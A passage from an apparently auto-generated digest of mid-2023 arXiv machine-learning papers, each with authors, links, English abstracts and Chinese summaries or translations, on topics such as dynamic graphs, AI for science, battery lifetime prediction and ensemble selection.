(TGN-attn, TGN-ID, Jodie). We demonstrate that our graph-sprints features, combined with a machine learning classifier, achieve competitive performance (outperforming all baselines for the node classification tasks in five datasets). Simultaneously, graph-sprints significantly reduce inference latencies, achieving close to an order of magnitude speed-up in our experimental setting.
    摘要 许多现实世界的数据集具有随时间演化的动态图结构,其中实体及其交互不断变化。机器学习模型应当考虑这些动态特性,才能在下游任务中充分发挥其潜力。以往的图表示学习方法要么基于k跳邻域采样(类似广度优先搜索),要么基于随机游走(类似深度优先搜索),但这些方法计算开销大,不适合在动态图上进行实时、低延迟的推理。为克服这些限制,我们提出了graph-sprints,一个面向连续时间动态图(CTDG)的通用特征提取框架,具有低延迟,且性能可与延迟更高的最新模型相媲美。为此,我们提出了一种对基于随机游走的特征进行流式、低延迟近似的方法:在我们的框架中,汇总多跳信息的时间感知节点嵌入仅通过对新到达边的单跳操作来计算。我们在三个公开数据集和两个内部数据集上评估了所提方法,并与三种最新算法(TGN-attn、TGN-ID、Jodie)进行了比较。结果表明,graph-sprints特征与机器学习分类器相结合可取得有竞争力的性能(在五个数据集的节点分类任务上优于所有基线),同时显著降低了推理延迟,在我们的实验设置中实现了接近一个数量级的加速。
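
A rough, hypothetical sketch of the general idea (not the authors' exact update rule): keep a per-node, time-decayed summary and refresh it with single-hop operations whenever an edge arrives, so multi-hop information accumulates without running random walks. The decay constant and feature names below are invented for illustration.

```python
import math
from collections import defaultdict

DECAY = 0.01  # assumed decay rate; the real method uses configured/learned time scales

# node_id -> (summary features, timestamp of last update)
state = defaultdict(lambda: ({"degree": 0.0, "nbr_mass": 0.0}, 0.0))

def on_edge(src, dst, t):
    """Single-hop, streaming update when edge (src -> dst) arrives at time t."""
    src_feat, src_t = state[src]
    dst_feat, dst_t = state[dst]

    # Decay the old summaries toward zero, then fold in the new interaction.
    for feat, last_t in ((src_feat, src_t), (dst_feat, dst_t)):
        dt = t - last_t
        for key in feat:
            feat[key] *= math.exp(-DECAY * dt)

    src_feat["degree"] += 1.0
    dst_feat["degree"] += 1.0
    # Multi-hop information leaks in because each endpoint absorbs a bit of
    # the other endpoint's (already multi-hop) summary -- still a 1-hop op.
    src_feat["nbr_mass"] += 0.5 * dst_feat["degree"]
    dst_feat["nbr_mass"] += 0.5 * src_feat["degree"]

    state[src] = (src_feat, t)
    state[dst] = (dst_feat, t)

for (u, v, t) in [(1, 2, 0.0), (2, 3, 1.0), (1, 3, 2.5), (3, 1, 4.0)]:
    on_edge(u, v, t)
print(dict(state))
```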

Artificial Intelligence for Science in Quantum, Atomistic, and Continuum Systems

  • paper_url: http://arxiv.org/abs/2307.08423
  • repo_url: https://github.com/divelab/AIRS
  • paper_authors: Xuan Zhang, Limei Wang, Jacob Helwig, Youzhi Luo, Cong Fu, Yaochen Xie, Meng Liu, Yuchao Lin, Zhao Xu, Keqiang Yan, Keir Adams, Maurice Weiler, Xiner Li, Tianfan Fu, Yucheng Wang, Haiyang Yu, YuQing Xie, Xiang Fu, Alex Strasser, Shenglong Xu, Yi Liu, Yuanqi Du, Alexandra Saxton, Hongyi Ling, Hannah Lawrence, Hannes Stärk, Shurui Gui, Carl Edwards, Nicholas Gao, Adriana Ladera, Tailin Wu, Elyssa F. Hofgard, Aria Mansouri Tehrani, Rui Wang, Ameya Daigavane, Montgomery Bohde, Jerry Kurtin, Qian Huang, Tuong Phung, Minkai Xu, Chaitanya K. Joshi, Simon V. Mathis, Kamyar Azizzadenesheli, Ada Fang, Alán Aspuru-Guzik, Erik Bekkers, Michael Bronstein, Marinka Zitnik, Anima Anandkumar, Stefano Ermon, Pietro Liò, Rose Yu, Stephan Günnemann, Jure Leskovec, Heng Ji, Jimeng Sun, Regina Barzilay, Tommi Jaakkola, Connor W. Coley, Xiaoning Qian, Xiaofeng Qian, Tess Smidt, Shuiwang Ji
  • for: 这篇论文主要针对的是利用人工智能(AI)进行自然科学研究(AI4Science)的新 paradigm。
  • methods: 论文使用的方法包括深度学习方法,以捕捉自然系统中的物理原理,特别是对称变换的equivariance。
  • results: 论文提供了一种Foundational and unified treatment of AI for quantum, atomistic, and continuum systems,并提出了一些解释性、过度分布采样和不确定性评估等技术挑战。
    Abstract Advances in artificial intelligence (AI) are fueling a new paradigm of discoveries in natural sciences. Today, AI has started to advance natural sciences by improving, accelerating, and enabling our understanding of natural phenomena at a wide range of spatial and temporal scales, giving rise to a new area of research known as AI for science (AI4Science). Being an emerging research paradigm, AI4Science is unique in that it is an enormous and highly interdisciplinary area. Thus, a unified and technical treatment of this field is needed yet challenging. This paper aims to provide a technically thorough account of a subarea of AI4Science; namely, AI for quantum, atomistic, and continuum systems. These areas aim at understanding the physical world from the subatomic (wavefunctions and electron density), atomic (molecules, proteins, materials, and interactions), to macro (fluids, climate, and subsurface) scales and form an important subarea of AI4Science. A unique advantage of focusing on these areas is that they largely share a common set of challenges, thereby allowing a unified and foundational treatment. A key common challenge is how to capture physics first principles, especially symmetries, in natural systems by deep learning methods. We provide an in-depth yet intuitive account of techniques to achieve equivariance to symmetry transformations. We also discuss other common technical challenges, including explainability, out-of-distribution generalization, knowledge transfer with foundation and large language models, and uncertainty quantification. To facilitate learning and education, we provide categorized lists of resources that we found to be useful. We strive to be thorough and unified and hope this initial effort may trigger more community interests and efforts to further advance AI4Science.
    摘要 人工智能技术的发展(AI)正在推动一种新的发现 paradigm in 自然科学。今天,AI已经开始为自然科学的研究提供了改进、加速和实现自然现象的理解,从而创造了一个新的研究领域——AI for science(AI4Science)。作为一个emerging research paradigm,AI4Science具有巨大的多学科性和挑战性,因此需要一种统一和技术性的处理。本文的目的是提供AI4Science中的一个子领域的技术深入报告,即用AI研究量子、原子istic和连续体系。这些领域旨在理解自然世界从子原子(振荡函数和电子密度)、原子(分子、蛋白质、材料和交互)到宏观(液体、气候和地壳)级别的物理世界,并形成AI4Science中一个重要的子领域。这些领域之间共享许多挑战,因此可以实现一种统一和基础的处理。一个关键的共同挑战是如何通过深度学习方法捕捉自然系统中的物理基本原理,特别是对称性。我们提供了深入 yet 易于理解的对于实现对称变换的方法的详细讲解。我们还讨论了其他一些常见的技术挑战,包括可解释性、out-of-distribution扩展、基础和大语言模型知识传递、和不确定性评估。为便于学习和教育,我们提供了分类列表,我们认为是有用的资源。我们努力保持统一和完整,希望这个初步努力可以触发更多的社区兴趣和努力,以进一步推动AI4Science的发展。

Neurosymbolic AI for Reasoning on Biomedical Knowledge Graphs

  • paper_url: http://arxiv.org/abs/2307.08411
  • repo_url: None
  • paper_authors: Lauren Nicole DeLong, Ramon Fernández Mir, Zonglin Ji, Fiona Niamh Coulter Smith, Jacques D. Fleuriot
  • for: 这篇论文旨在介绍基于神经符号智能的 hybrid 方法,以及其在生物医学领域中的应用和优势。
  • methods: 这篇论文主要介绍了基于 embedding 和符号 logic 的 hybrid 方法,以及它们在生物医学领域中的应用。
  • results: 论文总结了 hybrid 方法的优势和可能性,并指出了它们在生物医学领域中的应用可能性。
    Abstract Biomedical datasets are often modeled as knowledge graphs (KGs) because they capture the multi-relational, heterogeneous, and dynamic natures of biomedical systems. KG completion (KGC), can, therefore, help researchers make predictions to inform tasks like drug repositioning. While previous approaches for KGC were either rule-based or embedding-based, hybrid approaches based on neurosymbolic artificial intelligence are becoming more popular. Many of these methods possess unique characteristics which make them even better suited toward biomedical challenges. Here, we survey such approaches with an emphasis on their utilities and prospective benefits for biomedicine.
    摘要 生物医学数据集通常被建模为知识图谱(KG),因为知识图谱能够刻画生物医学系统多关系、异构且动态的特性。因此,知识图谱补全(KGC)可以帮助研究人员做出预测,为药物重定位等任务提供支持。以往的KGC方法要么基于规则,要么基于嵌入,而基于神经符号人工智能的混合方法正变得越来越流行。其中许多方法具有独特的特性,使其更加适合生物医学领域的挑战。本文综述了这类方法,并着重讨论了它们在生物医学中的用途和潜在收益。

Vocoder drift compensation by x-vector alignment in speaker anonymisation

  • paper_url: http://arxiv.org/abs/2307.08403
  • repo_url: None
  • paper_authors: Michele Panariello, Massimiliano Todisco, Nicholas Evans
  • for: 本研究探讨在基于x-vector的说话人匿名化方法中,匿名化效果主要来自vocoding而非核心匿名化函数这一现象。
  • methods: 本研究分析了所谓 vocoder drift 的来源,并提出了一种对 vocoder drift 进行补偿的原创方法。
  • results: 研究发现,该补偿方法可以显著减少 vocoder drift,并提供了对x-vector空间更好的控制。
    Abstract For the most popular x-vector-based approaches to speaker anonymisation, the bulk of the anonymisation can stem from vocoding rather than from the core anonymisation function which is used to substitute an original speaker x-vector with that of a fictitious pseudo-speaker. This phenomenon can impede the design of better anonymisation systems since there is a lack of fine-grained control over the x-vector space. The work reported in this paper explores the origin of so-called vocoder drift and shows that it is due to the mismatch between the substituted x-vector and the original representations of the linguistic content, intonation and prosody. Also reported is an original approach to vocoder drift compensation. While anonymisation performance degrades as expected, compensation reduces vocoder drift substantially, offers improved control over the x-vector space and lays a foundation for the design of better anonymisation functions in the future.
    摘要 在目前最流行的基于x-vector的说话人匿名化方法中,匿名化效果的主要来源往往是声码器(vocoder)处理,而不是用于以虚构伪说话人x-vector替换原始说话人x-vector的核心匿名化函数。由于缺乏对x-vector空间的细粒度控制,这一现象阻碍了更好的匿名化系统的设计。本文探究了所谓"声码器漂移(vocoder drift)"的来源,表明它源于被替换的x-vector与语言内容、语调和韵律的原始表征之间的失配。本文还提出了一种新的声码器漂移补偿方法:虽然匿名化性能会如预期般有所下降,但该补偿显著减小了声码器漂移,提供了对x-vector空间更好的控制,并为未来设计更好的匿名化函数奠定了基础。

On the application of Large Language Models for language teaching and assessment technology

  • paper_url: http://arxiv.org/abs/2307.08393
  • repo_url: None
  • paper_authors: Andrew Caines, Luca Benedetto, Shiva Taslimipoor, Christopher Davis, Yuan Gao, Oeistein Andersen, Zheng Yuan, Mark Elliott, Russell Moore, Christopher Bryant, Marek Rei, Helen Yannakoudakis, Andrew Mullooly, Diane Nicholls, Paula Buttery
  • for: 这篇论文探讨了用大型自然语言处理模型(PaLM和GPT-4)在语言教学和评估系统中的潜在应用。
  • methods: 论文考虑了几个研究领域,并讨论了在教育技术中使用生成AI的风险和伦理问题。
  • results: 研究发现大型语言模型在文本生成方面有所改进,但在自动评分和语法错误纠正方面,按标准评价指标衡量,仅靠大型语言模型并不能超越现有的最先进结果。
    Abstract The recent release of very large language models such as PaLM and GPT-4 has made an unprecedented impact in the popular media and public consciousness, giving rise to a mixture of excitement and fear as to their capabilities and potential uses, and shining a light on natural language processing research which had not previously received so much attention. The developments offer great promise for education technology, and in this paper we look specifically at the potential for incorporating large language models in AI-driven language teaching and assessment systems. We consider several research areas and also discuss the risks and ethical considerations surrounding generative AI in education technology for language learners. Overall we find that larger language models offer improvements over previous models in text generation, opening up routes toward content generation which had not previously been plausible. For text generation they must be prompted carefully and their outputs may need to be reshaped before they are ready for use. For automated grading and grammatical error correction, tasks whose progress is checked on well-known benchmarks, early investigations indicate that large language models on their own do not improve on state-of-the-art results according to standard evaluation metrics. For grading it appears that linguistic features established in the literature should still be used for best performance, and for error correction it may be that the models can offer alternative feedback styles which are not measured sensitively with existing methods. In all cases, there is work to be done to experiment with the inclusion of large language models in education technology for language learners, in order to properly understand and report on their capacities and limitations, and to ensure that foreseeable risks such as misinformation and harmful bias are mitigated.
    摘要 最近发布的非常大的自然语言处理模型,如PaLM和GPT-4,在流行媒体和公众意识中产生了无前例的影响,引发了诸多人的兴奋和担忧,对其能力和应用领域的潜在影响。这些发展在教育技术方面具有巨大潜力,在这篇论文中,我们专门关注在AI驱动的语言教学和评估系统中可能的应用。我们考虑了多个研究领域,并讨论了生成AI在教育技术中的风险和伦理考虑。总之,更大的语言模型在文本生成方面提供了改进,打开了新的内容生成途径,但是需要谨慎地提供提示,并且输出可能需要重新处理。在自动评分和 grammatical error correction 方面,初步调查表明,大语言模型独立使用不会超越现有的标准评价指标。在评分方面,使用现有的语言特征仍然是最佳选择,而在 error correction 方面,模型可能提供不同的反馈样式,不同于现有方法的敏感度评价。总之,需要进行实验来探索将大语言模型包含在教育技术中的可能性和局限性,以确保预期的风险,如误导和不良偏见,得到控制。

Correlation-aware Spatial-Temporal Graph Learning for Multivariate Time-series Anomaly Detection

  • paper_url: http://arxiv.org/abs/2307.08390
  • repo_url: https://github.com/astha-chem/mvts-ano-eval
  • paper_authors: Yu Zheng, Huan Yee Koh, Ming Jin, Lianhua Chi, Khoa T. Phan, Shirui Pan, Yi-Ping Phoebe Chen, Wei Xiang
  • for: 本研究旨在提出一种新的多变量时间序列异常检测方法,以解决现有方法中的非线性关系捕捉和时间序列异常检测问题。
  • methods: 本方法基于多变量时间序列相关学习模块,并采用空间时间图学习网络(STGNN)来编码复杂的变量间相关性。另外,通过借鉴一元和多元邻居信息,我们的STGNN组件可以吸收复杂的空间信息。同时,我们还提出了一种新的异常分数组件,可以在无监督情况下估计异常程度。
  • results: 实验结果表明,CST-GL方法可以在一般情况下有效地检测异常,并且可以在不同的时间延迟下进行早期检测。
    Abstract Multivariate time-series anomaly detection is critically important in many applications, including retail, transportation, power grid, and water treatment plants. Existing approaches for this problem mostly employ either statistical models which cannot capture the non-linear relations well or conventional deep learning models (e.g., CNN and LSTM) that do not explicitly learn the pairwise correlations among variables. To overcome these limitations, we propose a novel method, correlation-aware spatial-temporal graph learning (termed CST-GL), for time series anomaly detection. CST-GL explicitly captures the pairwise correlations via a multivariate time series correlation learning module based on which a spatial-temporal graph neural network (STGNN) can be developed. Then, by employing a graph convolution network that exploits one- and multi-hop neighbor information, our STGNN component can encode rich spatial information from complex pairwise dependencies between variables. With a temporal module that consists of dilated convolutional functions, the STGNN can further capture long-range dependence over time. A novel anomaly scoring component is further integrated into CST-GL to estimate the degree of an anomaly in a purely unsupervised manner. Experimental results demonstrate that CST-GL can detect anomalies effectively in general settings as well as enable early detection across different time delays.
    摘要 多变量时间序列异常检测在许多应用程序中非常重要,包括零售、交通、电力网络和水处理厂。现有的方法通常使用统计模型,这些模型不能很好地捕捉非线性关系,或者使用传统的深度学习模型(如CNN和LSTM),这些模型不直接学习时间序列变量之间的对比关系。为了解决这些限制,我们提出了一种新的方法,即相关意识空间时间图学习(CST-GL),用于时间序列异常检测。CST-GL使用多变量时间序列相关学习模块,该模块可以识别时间序列变量之间的对比关系。然后,通过基于这些相关关系的空间时间图 neural network(STGNN)的开发,我们可以融合复杂的对比关系信息,以获得rich的空间信息。此外,我们还使用一个包含扩展延迟 convolutional functions的时间模块,以捕捉长距离时间关系。最后,我们还添加了一个异常分数组件,以无监督的方式估算异常的程度。实验结果表明,CST-GL可以有效地检测异常情况,并且可以在不同的时间延迟下进行早期检测。

Tabular Machine Learning Methods for Predicting Gas Turbine Emissions

  • paper_url: http://arxiv.org/abs/2307.08386
  • repo_url: None
  • paper_authors: Rebecca Potts, Rick Hackney, Georgios Leontidis
  • for: 这项研究旨在评估机器学习模型在预测燃气轮机污染物排放方面的性能。
  • methods: 我们将现有的基于化学动力学的预测排放模型与我们基于SAINT和XGBoost开发的两种机器学习模型进行比较,以展示机器学习技术能够提供更好的预测性能。
  • results: 我们发现,使用机器学习技术可以提高氮氧化物(NOx)和一氧化碳(CO)的预测性能。
    Abstract Predicting emissions for gas turbines is critical for monitoring harmful pollutants being released into the atmosphere. In this study, we evaluate the performance of machine learning models for predicting emissions for gas turbines. We compare an existing predictive emissions model, a first principles-based Chemical Kinetics model, against two machine learning models we developed based on SAINT and XGBoost, to demonstrate improved predictive performance of nitrogen oxides (NOx) and carbon monoxide (CO) using machine learning techniques. Our analysis utilises a Siemens Energy gas turbine test bed tabular dataset to train and validate the machine learning models. Additionally, we explore the trade-off between incorporating more features to enhance the model complexity, and the resulting presence of increased missing values in the dataset.
    摘要 预测燃气轮机的排放对于监测排入大气的有害污染物至关重要。本研究评估了机器学习模型在预测燃气轮机排放方面的表现:我们将现有的基于化学动力学的第一性原理预测排放模型,与我们基于SAINT和XGBoost开发的两种机器学习模型进行比较,以展示机器学习技术在氮氧化物(NOx)和一氧化碳(CO)预测上的改进。我们的分析使用Siemens Energy燃气轮机试验台的表格数据集来训练和验证机器学习模型。此外,我们还探讨了引入更多特征以增强模型复杂度与随之而来的数据缺失值增加之间的权衡。
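
A hedged sketch of the tabular-ML side of such a study: an XGBoost regressor fitted to synthetic stand-ins for turbine operating parameters and NOx labels. It is not the paper's pipeline (which also evaluates SAINT on the Siemens Energy test-bed data).

```python
# pip install xgboost scikit-learn
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_absolute_error
from xgboost import XGBRegressor

rng = np.random.default_rng(0)
n = 5000
# Synthetic stand-ins for operating parameters (load, ambient temperature, fuel flow, ...).
X = rng.normal(size=(n, 6))
nox = 50 + 10 * X[:, 0] - 5 * X[:, 1] + 3 * X[:, 2] * X[:, 3] + rng.normal(scale=2, size=n)

X_tr, X_te, y_tr, y_te = train_test_split(X, nox, random_state=0)
model = XGBRegressor(n_estimators=300, max_depth=4, learning_rate=0.05)
model.fit(X_tr, y_tr)
print("NOx MAE:", mean_absolute_error(y_te, model.predict(X_te)))
```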

Predicting Battery Lifetime Under Varying Usage Conditions from Early Aging Data

  • paper_url: http://arxiv.org/abs/2307.08382
  • repo_url: None
  • paper_authors: Tingkai Li, Zihao Zhou, Adam Thelen, David Howey, Chao Hu
  • for: 预测锂离子电池寿命,以支持预防性维护、质保以及改进电芯设计与制造。
  • methods: 利用寿命早期数据(例如容量-电压数据)提取新的特征,以预测电芯在差异很大的充电倍率、放电倍率和放电深度下的寿命。
  • results: 基于新生成的数据集(225只镍锰钴/石墨锂离子电芯),对分布内电芯实现了准确的寿命预测(平均绝对百分比误差15.1%);进一步使用分层贝叶斯回归模型可以更好地进行外推预测(平均绝对百分比误差21.8%)。
    Abstract Accurate battery lifetime prediction is important for preventative maintenance, warranties, and improved cell design and manufacturing. However, manufacturing variability and usage-dependent degradation make life prediction challenging. Here, we investigate new features derived from capacity-voltage data in early life to predict the lifetime of cells cycled under widely varying charge rates, discharge rates, and depths of discharge. Features were extracted from regularly scheduled reference performance tests (i.e., low rate full cycles) during cycling. The early-life features capture a cell's state of health and the rate of change of component-level degradation modes, some of which correlate strongly with cell lifetime. Using a newly generated dataset from 225 nickel-manganese-cobalt/graphite Li-ion cells aged under a wide range of conditions, we demonstrate a lifetime prediction of in-distribution cells with 15.1% mean absolute percentage error using no more than the first 15% of data, for most cells. Further testing using a hierarchical Bayesian regression model shows improved performance on extrapolation, achieving 21.8% mean absolute percentage error for out-of-distribution cells. Our approach highlights the importance of using domain knowledge of lithium-ion battery degradation modes to inform feature engineering. Further, we provide the community with a new publicly available battery aging dataset with cells cycled beyond 80% of their rated capacity.
    摘要 准确的电池寿命预测对于预防性维护、质保以及改进电芯设计与制造都十分重要。然而,制造差异和随使用条件而变化的老化使得寿命预测颇具挑战。本文研究了从电池寿命早期的容量-电压数据中提取的新特征,用于预测在差异很大的充电倍率、放电倍率和放电深度下循环的电芯寿命。这些特征取自循环过程中定期安排的参考性能测试(即低倍率完整循环),能够刻画电芯的健康状态以及组件级退化模式的变化速率,其中一些与电芯寿命高度相关。基于一套新生成的数据集(225只镍锰钴/石墨锂离子电芯,在广泛的条件下老化),我们证明对大多数分布内电芯,仅使用前15%的数据即可实现平均绝对百分比误差为15.1%的寿命预测。进一步使用分层贝叶斯回归模型进行测试表明,对分布外电芯的外推性能有所提升,平均绝对百分比误差为21.8%。我们的方法突显了利用锂离子电池退化模式的领域知识来指导特征工程的重要性。此外,我们还向社区公开了一套新的电池老化数据集,其中的电芯循环至低于其额定容量的80%。

Q(D)O-ES: Population-based Quality (Diversity) Optimisation for Post Hoc Ensemble Selection in AutoML

  • paper_url: http://arxiv.org/abs/2307.08364
  • repo_url: https://github.com/LennartPurucker/PopulationBasedQDO-PostHocEnsembleSelectionAutoML
  • paper_authors: Lennart Purucker, Lennart Schneider, Marie Anastacio, Joeran Beel, Bernd Bischl, Holger Hoos
  • for: 提高预测性能(Post hoc ensemble learning)
  • methods: 引入两种新的人口基于 ensemble selection方法(QO-ES和QDO-ES),比较GES
  • results: 在71个分类数据集上测试,QO-ES和QDO-ES常常优于GES,但这一差异仅在验证数据上具有统计显著性;此外还发现多样性有利于事后集成,但也会增加过拟合风险。
    Abstract Automated machine learning (AutoML) systems commonly ensemble models post hoc to improve predictive performance, typically via greedy ensemble selection (GES). However, we believe that GES may not always be optimal, as it performs a simple deterministic greedy search. In this work, we introduce two novel population-based ensemble selection methods, QO-ES and QDO-ES, and compare them to GES. While QO-ES optimises solely for predictive performance, QDO-ES also considers the diversity of ensembles within the population, maintaining a diverse set of well-performing ensembles during optimisation based on ideas of quality diversity optimisation. The methods are evaluated using 71 classification datasets from the AutoML benchmark, demonstrating that QO-ES and QDO-ES often outrank GES, albeit only statistically significant on validation data. Our results further suggest that diversity can be beneficial for post hoc ensembling but also increases the risk of overfitting.
    摘要 自动机器学习(AutoML)系统通常在训练之后对模型进行集成(post hoc ensembling)以提升预测性能,最常用的做法是贪婪集成选择(GES)。但我们认为 GES 未必总是最优,因为它只执行一种简单的确定性贪婪搜索。在这项工作中,我们引入了两种新的基于种群的集成选择方法 QO-ES 和 QDO-ES,并与 GES 进行比较。QO-ES 仅针对预测性能进行优化,而 QDO-ES 借鉴质量-多样性优化的思想,还考虑种群内集成的多样性,在优化过程中维持一组多样且表现良好的集成。这些方法在 AutoML benchmark 的 71 个分类数据集上进行了评估,结果显示 QO-ES 和 QDO-ES 常常优于 GES,但这一优势仅在验证数据上具有统计显著性。我们的结果还表明,多样性有利于事后集成,但同时也增加了过拟合的风险。
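
For reference, the GES baseline that QO-ES and QDO-ES are compared against is the classic Caruana-style greedy loop sketched below (selection with replacement, averaging predicted probabilities); the proposed methods replace this deterministic search with a population of ensembles, optionally maintained for diversity. Toy data only.

```python
import numpy as np

def greedy_ensemble_selection(val_probs, y_val, n_rounds=20):
    """Caruana-style GES baseline: repeatedly add (with replacement) the model
    whose inclusion most improves validation accuracy of the averaged ensemble.
    val_probs: array of shape (n_models, n_samples, n_classes)."""
    n_models = val_probs.shape[0]
    counts = np.zeros(n_models, dtype=int)
    current = np.zeros_like(val_probs[0])

    def acc(probs):
        return (probs.argmax(axis=1) == y_val).mean()

    for _ in range(n_rounds):
        best_m, best_score = None, -1.0
        for m in range(n_models):
            cand = (current * counts.sum() + val_probs[m]) / (counts.sum() + 1)
            score = acc(cand)
            if score > best_score:
                best_m, best_score = m, score
        counts[best_m] += 1
        current = (val_probs * counts[:, None, None]).sum(axis=0) / counts.sum()
    return counts

# Toy example: 5 "models" with random validation predictions.
rng = np.random.default_rng(0)
y_val = rng.integers(0, 3, size=200)
probs = rng.dirichlet(np.ones(3), size=(5, 200))
print("selection counts:", greedy_ensemble_selection(probs, y_val))
```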

Universal Online Learning with Gradual Variations: A Multi-layer Online Ensemble Approach

  • paper_url: http://arxiv.org/abs/2307.08360
  • repo_url: None
  • paper_authors: Yu-Hu Yan, Peng Zhao, Zhi-Hua Zhou
  • for: 这篇论文提出了一种在线凸优化方法,能够在不同层面上适应不同类型和曲率的损失函数。
  • methods: 该方法基于一种多层在线集成,包含精心设计的乐观项(optimism)和用于保证算法稳定性的级联修正(cascaded corrections)。
  • results: 该方法可以获得 $\mathcal{O}(\ln V_T)$, $\mathcal{O}(d \ln V_T)$ 和 $\hat{\mathcal{O}(\sqrt{V_T})$ 的 regret bounds,其中 $d$ 是维度、$V_T$ 是问题依赖于的梯度变化。此外,该方法还有广泛的应用和意义,包括保证最坏情况下的 guarantees,直接从分析中提取小损 bounds,以及与对抗/随机 convex optimization 和游戏理论的深刻连接。
    Abstract In this paper, we propose an online convex optimization method with two different levels of adaptivity. On a higher level, our method is agnostic to the specific type and curvature of the loss functions, while at a lower level, it can exploit the niceness of the environments and attain problem-dependent guarantees. To be specific, we obtain $\mathcal{O}(\ln V_T)$, $\mathcal{O}(d \ln V_T)$ and $\hat{\mathcal{O}(\sqrt{V_T})$ regret bounds for strongly convex, exp-concave and convex loss functions, respectively, where $d$ is the dimension, $V_T$ denotes problem-dependent gradient variations and $\hat{\mathcal{O}(\cdot)$-notation omits logarithmic factors on $V_T$. Our result finds broad implications and applications. It not only safeguards the worst-case guarantees, but also implies the small-loss bounds in analysis directly. Besides, it draws deep connections with adversarial/stochastic convex optimization and game theory, further validating its practical potential. Our method is based on a multi-layer online ensemble incorporating novel ingredients, including carefully-designed optimism for unifying diverse function types and cascaded corrections for algorithmic stability. Remarkably, despite its multi-layer structure, our algorithm necessitates only one gradient query per round, making it favorable when the gradient evaluation is time-consuming. This is facilitated by a novel regret decomposition equipped with customized surrogate losses.
    摘要 在这篇论文中,我们提出了一种在线凸优化方法,具有两个不同的水平的适应性。在更高的水平上,我们的方法是对具体类型和曲率的损失函数不偏袋,而在更低的水平上,它可以利用环境的温柔性并实现问题依赖的保证。具体来说,我们获得了$\mathcal{O}(\ln V_T)$, $\mathcal{O}(d \ln V_T)$和$\hat{\mathcal{O}(\sqrt{V_T})$的 regret bound,其中$d$是维度,$V_T$表示问题依赖的梯度变化,$\hat{\mathcal{O}(\cdot)$-notation忽略了$V_T$的对数因子。我们的结果具有广泛的应用和意义。它不仅保证了最坏情况的保证,而且直接从分析中获得了小损失的 bound。此外,它还与反对抗/随机凸优化和游戏理论之间存在深刻的连接,进一步证明其实用性。我们的方法基于一种多层在线ensemble,包括新的优势因子,例如精心设计的乐观性以及随机逻辑的级联 corrections。备注意的是,即使具有多层结构,我们的算法只需要每个回合一次获取梯度,因此在梯度评估是时间耗费的情况下,它是有利的。这是由一种新的 regret decomposition和自定义损失函数帮助实现的。

Zero-th Order Algorithm for Softmax Attention Optimization

  • paper_url: http://arxiv.org/abs/2307.08352
  • repo_url: None
  • paper_authors: Yichuan Deng, Zhihang Li, Sridhar Mahadevan, Zhao Song
  • for: 本研究旨在提高大型自然语言模型(LLM)的优化技术,特别是在计算梯度时的效率。
  • methods: 本研究提出了一种专门针对softmax单元的零阶(zeroth-order)算法,仅通过前向传播来近似计算梯度。
  • results: 我们的算法能够高效地计算大规模LLM的梯度,并且可以在不同的语言模型中实现效果。
    Abstract Large language models (LLMs) have brought about significant transformations in human society. Among the crucial computations in LLMs, the softmax unit holds great importance. Its helps the model generating a probability distribution on potential subsequent words or phrases, considering a series of input words. By utilizing this distribution, the model selects the most probable next word or phrase, based on the assigned probabilities. The softmax unit assumes a vital function in LLM training as it facilitates learning from data through the adjustment of neural network weights and biases. With the development of the size of LLMs, computing the gradient becomes expensive. However, Zero-th Order method can approximately compute the gradient with only forward passes. In this paper, we present a Zero-th Order algorithm specifically tailored for Softmax optimization. We demonstrate the convergence of our algorithm, highlighting its effectiveness in efficiently computing gradients for large-scale LLMs. By leveraging the Zeroth-Order method, our work contributes to the advancement of optimization techniques in the context of complex language models.
    摘要 大型语言模型(LLM)给人类社会带来了深刻的变革。在LLM的关键计算中,softmax单元尤为重要:它根据一系列输入词为后续可能出现的词或短语生成概率分布,模型据此选择概率最高的下一个词或短语。softmax单元在LLM训练中起着至关重要的作用,因为它通过调整神经网络的权重和偏置来支撑模型从数据中学习。随着LLM规模的增大,梯度计算的代价也随之升高;而零阶(zeroth-order)方法仅通过前向传播即可近似计算梯度。本文提出了一种专门针对softmax优化的零阶算法,并证明了其收敛性,突出了它在大规模LLM梯度计算中的高效性。借助零阶方法,本工作推动了复杂语言模型背景下优化技术的发展。
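
A minimal numpy illustration of the generic two-point zeroth-order estimator such methods build on: the gradient of a softmax cross-entropy loss is approximated using only forward evaluations and compared against the analytic gradient. This is not the paper's algorithm, which is tailored to softmax attention and comes with its own convergence analysis.

```python
import numpy as np

rng = np.random.default_rng(0)

def softmax(z):
    z = z - z.max()
    e = np.exp(z)
    return e / e.sum()

def loss(w, x, target):
    """Cross-entropy of a softmax unit with logits w @ x."""
    p = softmax(w @ x)
    return -np.log(p[target])

def zeroth_order_grad(w, x, target, mu=1e-3, n_dirs=50):
    """Two-point random-direction estimator: only forward evaluations of the loss."""
    g = np.zeros_like(w)
    f0 = loss(w, x, target)
    for _ in range(n_dirs):
        u = rng.normal(size=w.shape)
        g += (loss(w + mu * u, x, target) - f0) / mu * u
    return g / n_dirs

d, k = 8, 3
w = rng.normal(size=(k, d))
x = rng.normal(size=d)
g_est = zeroth_order_grad(w, x, target=1)

# Sanity check against the analytic softmax gradient: (p - onehot) x^T
p = softmax(w @ x)
g_true = np.outer(p - np.eye(k)[1], x)
cos = np.dot(g_est.ravel(), g_true.ravel()) / (np.linalg.norm(g_est) * np.linalg.norm(g_true))
print("cosine similarity with analytic gradient:", cos)
```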

M-FLAG: Medical Vision-Language Pre-training with Frozen Language Models and Latent Space Geometry Optimization

  • paper_url: http://arxiv.org/abs/2307.08347
  • repo_url: https://github.com/cheliu-computation/m-flag-miccai2023
  • paper_authors: Che Liu, Sibo Cheng, Chen Chen, Mengyun Qiao, Weitong Zhang, Anand Shah, Wenjia Bai, Rossella Arcucci
  • for: 这项研究旨在提出一种新的医疗视觉-语言模型预训练方法,以提高此类模型训练的稳定性和效率。
  • methods: 所提方法名为M-FLAG,它在预训练中使用冻结的语言模型以保证训练稳定高效,并引入一种新的正交性损失来调和潜在空间的几何结构。
  • results: 实验结果显示,M-FLAG能对医疗视觉-语言模型进行有效的预训练,并在医疗图像分类、分割和目标检测三个下游任务中表现出色;尤其是在分割任务中,M-FLAG仅使用RSNA数据集的1%,即可超越使用100%数据微调的ImageNet预训练模型。
